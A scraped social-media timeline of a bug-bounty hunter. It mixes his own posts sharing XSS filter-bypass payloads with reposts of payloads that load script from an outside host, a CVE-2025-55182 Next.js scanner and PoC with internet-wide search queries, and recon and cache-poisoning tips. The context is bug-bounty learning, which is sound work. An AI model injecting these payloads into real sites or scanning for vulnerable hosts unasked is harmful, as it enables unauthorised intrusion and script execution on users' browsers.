dirtycoder0124's profile picture. A positive, never give up person. Founder of https://blindf.com
Telegram group
https://t.me/+xa7Q6GcEudFkYzA1

dirty0124

@dirtycoder0124

A positive, never give up person. Founder of https://blindf.com Telegram group https://t.me/+xa7Q6GcEudFkYzA1

Another good payload <script ysx<>Reflect.apply(alert,null,[1])</script xy<> #xsspayload #bugbountytips

dirtycoder0124's tweet image. Another good payload
&amp;lt;script ysx&amp;lt;&amp;gt;Reflect.apply(alert,null,[1])&amp;lt;/script xy&amp;lt;&amp;gt;
#xsspayload
#bugbountytips

A very good xss payload. <sCriPt x>(((confirm)))``</scRipt x> #bugbountytips #xss #bugbounty

dirtycoder0124's tweet image. A very good xss payload.
&amp;lt;sCriPt x&amp;gt;(((confirm)))``&amp;lt;/scRipt x&amp;gt;
#bugbountytips #xss #bugbounty

dirty0124 님이 재게시함

Want to learn complex xss attacks with practical for free? Then this post is for you! Hi everyone! I've added a new video in my xss playlist showing how i was able to find an interesting xss attack in NASA with full practical demonstration Check it out here:…

thehacktivator's tweet image. Want to learn complex xss attacks with practical for free? Then this post is for you!

Hi everyone! I&apos;ve added a new video in my xss playlist showing how i was able to find an interesting xss attack in NASA with full practical demonstration

Check it out here:…

dirty0124 님이 재게시함

I've developed a professional and technical tool for Next.js (CVE-2025-55182) 🥳 I'm offering this tool, which allows you to perform both bulk and individual scans, as well as testing on live subdomains. github; github.com/ynsmroztas/Nex… #DevTools #python #bugbountytip

ynsmroztas's tweet image. I&apos;ve developed a professional and technical tool for Next.js (CVE-2025-55182) 🥳

I&apos;m offering this tool, which allows you to perform both bulk and individual scans, as well as testing on live subdomains.

github;

github.com/ynsmroztas/Nex…

#DevTools #python #bugbountytip…

dirty0124 님이 재게시함

Reminder: React2Shell detection is live across Burp Suite. If you’re assessing exposure in Next.js apps, here’s how to run reliable checks with Burp Suite Professional or Burp Suite DAST: bit.ly/4rFhtij


dirty0124 님이 재게시함

🚨 POC for CVE-2025-55182 that works on Next.js 16.0.6 Here are the exact, battle-tested queries you need — Censys, Shodan, FOFA, ZoomEye, Quake, BinaryEdge, Hunter.how, and Nuclei matchers — all tuned specifically to find Next.js RSC / React Server Components…


Paste the data, and it will extract the domains. Not perfect, but useful for me. #bugbountytips #BugBounty dirtycoder0124.github.io/domain-extract…

dirtycoder0124's tweet image. Paste the data, and it will extract the domains. Not perfect, but useful for me.
#bugbountytips #BugBounty
dirtycoder0124.github.io/domain-extract…

Just got a reward for a high vulnerability submitted on @yeswehack -- (XSS) - Stored (CWE-79). yeswehack.com/hunters/dirty0… #YesWeRHackers Steps: 1. Found misconfigured Algolia key 2. Escalate it into Stored XSS 3. Payload executed when searching for a specific keyword #bugbountytips


dirty0124 님이 재게시함

Bug Bounty Search Engine Google advanced search queries generator for target domain: File & Directory Discovery Vulnerabilities & Exploits Subdomain & Asset Discovery And lot more github.com/gatiella/Bug-B… #InfoSec #BugBounty #bugbountytips #CyberSecurity

viehgroup's tweet image. Bug Bounty Search Engine

Google advanced search queries generator for target domain:

File &amp;amp; Directory Discovery
Vulnerabilities &amp;amp; Exploits
Subdomain &amp;amp; Asset Discovery
And lot more

github.com/gatiella/Bug-B…

#InfoSec #BugBounty #bugbountytips #CyberSecurity

dirty0124 님이 재게시함

Stop missing cache poisoning vulnerabilities. Most hunters only test X-Forwarded-Host and miss 90% of the attack surface. I wrote a complete guide to finding what others miss: medium.com/@Aacle/the-cac… #bugbounty #infosec

aacle_'s tweet image. Stop missing cache poisoning vulnerabilities.

Most hunters only test X-Forwarded-Host and miss 90% of the attack surface.

I wrote a complete guide to finding what others miss:

medium.com/@Aacle/the-cac…

#bugbounty #infosec

dirty0124 님이 재게시함

LLM-powered subdomain enumeration tool.⚔️ - github.com/samogod/samosc… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. LLM-powered subdomain enumeration tool.⚔️

- github.com/samogod/samosc…

#infosec #cybersec #bugbountytips

dirty0124 님이 재게시함

Everyone hunts for common bugs… but the real rewards often hide in the underrated ones. I’ve made a YouTube playlist — “Underrated Vulnerabilities” showing how to find impactful bugs most hackers miss. Practical. Real. Eye-opening. Watch here: youtube.com/watch?v=GZ5yaQ…

thehacktivator's tweet image. Everyone hunts for common bugs… but the real rewards often hide in the underrated ones.

I’ve made a YouTube playlist — “Underrated Vulnerabilities” showing how to find impactful bugs most hackers miss.
Practical. Real. Eye-opening.
Watch here:  youtube.com/watch?v=GZ5yaQ…

dirty0124 님이 재게시함

Want to learn XSS from scratch and turn it into real, practical skills? I made a 23-video YouTube playlist that takes you from basic payloads to advanced XSS chains — with live target demos. Completely FREE. Watch the playlist youtube.com/watch?v=1WFEVp…

thehacktivator's tweet image. Want to learn XSS from scratch and turn it into real, practical skills?

I made a 23-video YouTube playlist that takes you from basic payloads to advanced XSS chains — with live target demos.

Completely FREE. Watch the playlist

youtube.com/watch?v=1WFEVp…

dirty0124 님이 재게시함

Best Alternatives to alert(1) #XSS Payload 1. import('//X55.is') x55.is/brutelogic/xss… 2. $.getScript('//X55.is') * x55.is/brutelogic/xss… 3. appendChild(createElement`script`).src='//X55.is' x55.is/brutelogic/xss… * requires jQuery loaded on DOM #hack2learn


dirty0124 님이 재게시함

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find &quot;all&quot; paths for Next.js websites:
DevTools-&amp;gt;Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join(&apos;\n&apos;));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

Loading...

Something went wrong.


Something went wrong.